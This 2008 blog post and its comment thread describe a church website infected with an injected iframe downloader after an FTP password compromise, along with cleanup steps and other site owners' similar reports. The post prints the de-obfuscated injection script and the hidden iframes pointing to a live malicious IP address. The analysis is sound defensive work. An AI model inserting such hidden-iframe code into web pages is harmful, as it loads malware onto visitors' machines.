Bitten by an iframe downloader virus
Posted by
Brad Wood
Jun 30, 2008 13:38:00 UTC
Well, my church's website got bit this week. I'll point out that I have nothing to do with the hosting or security of this site, I just help them keep it updated. The site is hosted at IPower, which in my overall opinion as a hosting company falls somewhere between pond scum and moss. No wait, make it rock. Scum or moss would be giving them too much credit. (That's another story though)
Fortunately for IPower, this one can't be blamed on them. It appears someone guessed our FTP login's password, (probably a port scan and brute force attack) and recursively perused through our site modifying any file which was named index.*The following snipped of code was added to the bottom of each of those pages:
The string is just a url encoded string of JavaScript. The unescape() function de-obfuscates it and then it is passed into the eval() to be executed. This is the equivalent code:
The string is just a url encoded string of JavaScript. The unescape() function de-obfuscates it and then it is passed into the eval() to be executed. This is the equivalent code:
[code]<script>
window.status='Done';
document.write('<iframe name=8b4 src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*20655)+'4d\' width=765 height=27 style=\'display: none\'></iframe>';
</script>
[/code]
So, you can see whenever someone visits your site, an iframe is loaded at the bottom of the page that includes the output of a remote (and malicious) PHP script.
I immediately called up and changed the password on our main FTP account and had two additional FTP accounts deleted that weren't even in use. I don't even know what their passwords where... yikes!
Then I searched through the entire site and manually cleaned all files that had the offending JavaScript inserted into them. I'm fairly confident that was the only damage done, but it's hard to be sure. Luckily the entire site is just a bunch of static content so there were no code secrets or additional passwords to be lost. The whole thing kind of makes me uneasy though. Of course, the brilliant folks over at IPower don't keep ANY authentication logs for their FTP servers. Lame.
Well, today I got a chance to fiddle with the Script injection to try and see what it was loading. The contents of the malicious page were as follows:
[code] <iframe src= http://58.65.232.33/nonick/index.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe> <iframe src= http://58.65.232.33/gpack/index1.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe> <iframe src= http://58.65.232.33/counter.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe> <iframe src= http://58.65.232.33/01/01/update.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe> [/code]Interesting. Apparently just an additional layer of smoke, but those four iframes still pointed to pages on the same server. The first iframe returned the following with a 200 status code:
[code] . ![/code]I'll let you take a stab at what that was supposed to do. The second iframe returned the following with a 200 status code:
[code]Can`t connect to mysql server[/code]Very, very 31337 indeed. The third iframe returned the following with a 200 status code:
[code] <HTML> <HEAD> <TITLE>Not Found</TITLE> </HEAD> <BODY> The requested URL was not found on this server. <br><br><HR noshade="noshade"> Apache/1.3.31 Server at Port 80 </BODY> </HTML>[/code]Not sure why it didn't give me a 404 status code. The fourth iframe returned an empty response body with a 302 status code and an empty location header. Weird. Well, it looks like they have either taken down the malicious content since Sunday, or they are too stupid to keep their site up. In the mean time we'll try not to be too stupid to have easy-to-crack passwords. And I leave us with this well-written line from Weird Al:
[code]%57%68%61%74%63%68%61%27%6C%6C%20%77%61%6E%6E%61%20%64%6F%3F%20%57%61%6E%6E%61%20%62%65%20%68%61%63%6B%65%72%73%3F%20%43%6F%64%65%20%63%72%61%63%6B%65%72%73%2C%20%73%6C%61%63%6B%65%72%73%20%57%61%73%74%69%6E%27%20%74%69%6D%65%20%77%69%74%68%20%61%6C%6C%20%74%68%65%20%63%68%61%74%72%6F%6F%6D%20%79%61%6B%6B%65%72%73%3F%209%20%74%6F%205%20%63%68%69%6C%6C%69%6E%27%20%61%74%20%48%65%77%6C%65%74%74%2D%50%61%63%6B%61%72%64%20%57%68%61%74%3F[/code]
Tags: Technology
Wilgeno
Check your blog site also. When I brought up your page my AVG Virus scan went nuts! Either the code samples of the virus are not escaped properly as to not run or even escaped properly the Virus scanners still detect. I would suggest making an png image of the code. That way we know it won't execute.
Brad Wood
@Wilgeno: Thanks for the heads up. My server is definitley clean and the code is escaped, but your antivirus must be matching the pattern off the screen. I know I had problems poking around with the scripts because every time I tried to save ANY file with those lines of text in it, my AV would yell at me. I will just replace them with an image when I get a chance.
Wilgeno
Cool deal.. BTW: I wrote a quick Perl script that will search all your/my web files for this virus. It simply looks for 'script' and 'eval' on a line of code and the logs the file and line number to a log file. For those with out a virus scanner on their server or in the position to install one they can use this to simply use this to scan their own files. Of course it can easily be modified to find other html/script plain text type attacks.
Cheers,
Samatva
It might be iPower related - there's a site on server 66.96.130.133 that recently got exactly the same infection....
EdC
I also received the same attack for my site. I am hosted on iPower. I don't think I will be renewing my hosting with them.
RLS
I am the webmaster for several websites - all hosted on ipowerweb. Two of them were hacked on 6/30/08 (same date as yours) with the same virus. I'm currently looking for another web hosting service.
BK
I am also iPower hosted and recently discovered this exploit while backing up my www directory. AVG went nuts. I'm beginning to think it could be a compromised server because I don't think all of us would have our FTP passwords cracked.
Gary
I am also an iPower customer and found this very hack in several word press installs.
I used the Word Press Exploit Scanner plugin to find all occurrences of the script and then removed them manually. As stated they were always found in index.php files.
Gary
I would also like to add that this hack originated from the iPower side, I did a fresh wp2.5.1 install and it was clean, a week later that hack showed up. After upgrading to wp2.6 the hack showed up again. I have since hardened my server and wp Install.
I learned about all of this because my site was tagged by Google as a Malware site.
Gary
LeVar
I too upkeep a church website and was attacked by this same downloader. My site is not hosted at Ipower but at startlogic. Same date, same attack all my index files had it. I cleaned all my index files and waiting on google, firefox, and mcaffee site advisor to remove me from the blackist.
Don S
ipower and startlogic are one in the same per the comment on http://www.hostindex.com/web/startlogic/startlogic_differences_to_against_ipower.shtm, I am a StartLogic customer and had three index.html pages hacked with the Framer.Z script (added the line at the end of the page). I can't believe they were able to get all of our FTP passwords unless they happen to be sniffing from the server remotely or something.
LeVar
oh I see they are the same company. Yeah, the only thing i see is that the whole server was hacked into. Im mostly good now got google to take me off the black list and now waiting on mcaffee to do the same for one of my urls.
Gina
I host with www.godaddy.com and several of my sites were attacked. I had one of the site son a virtual server. The attack on it was so bad the site had to be taken down. Google had warnings on all of the pages they served.
Al Woodhull
On Jan 4 2009 a site of which I am the webmaster, hosted on iPower, had hundreds of hidden links added at the end of the top level index.html, just above the closing /body and /html tags. I think these links were probably intended to increase the search ranking of the sites linked to. The mechanism was apparently a php script which when activated modified my index page by going out and downloading the text inserted. The php file was named rmx.php. My first guess was that somehow my ftp password was guessed or sniffed, and I changed the password. After hearing that iPower has been exploited before I now wonder about this. I would like to hear if others have seen this kind of thing on websites on iPower or anyone else.
alex
We have 100 websites on several hosts, we deleted the script over and over but it keeps coming back and seem to jump from site to site (auto generated script). We changed host again but AGAIN we get the same virus and warnings on google. Searching for a way to get rid of this. <iframe src
dont know what it is and what to do. Even by changing host it came back.... who knows the answer or knows some script to implement in the website to protect ???